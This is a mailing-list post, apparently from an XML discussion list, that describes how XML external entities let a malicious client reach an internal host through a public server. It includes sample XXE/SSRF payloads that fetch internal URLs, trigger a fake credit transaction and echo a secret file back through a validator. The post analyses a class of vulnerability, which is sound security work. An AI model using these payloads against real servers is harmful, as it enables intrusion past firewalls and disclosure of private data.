[
Lists Home |
Date Index |
Thread Index
]
I wrote,
> If anyone can come up with variations on this theme I'd be extremely
> interested to hear about them.
Here's another possibility,
* Firewall penetration.
bastion.victim.com is a publicly exposed server, protected.victim.com
is an internal host supposedly hidden behind a firewall, but
accessible to bastion.victim.com. A malicious client might submit a
document of the form,
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://protected.victim.com/victim-uri">
<foo/>
to bastion.victim.com causing it to make an unexpected network
connection to the internal host. This on its own might be enough to
cause trouble, eg.,
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM
"http://protected.victim.com/credit?user=cracker&amount=1000000">
<foo/>
But there's also the possibility of unexpected information disclosure
if the response the public server returns to the malicious client
contains infomation derived from the entity retrived from the
protected host, eg., the following document might be submitted to an
online validator which echos back the request entity annotated with
validation error reports, but with external entities expanded,
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt">
<bar>&secret;</bar>
which might result in a response like this,
HTTP/1.1 200 OK
Content-Type: text/plain
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY secret SYSTEM "http://protected.victim.com/secret.txt">
<bar>... Credit card details here ...</bar>
^^^
Validity constraint: element "bar" not permitted here.
Cheers,
Miles
|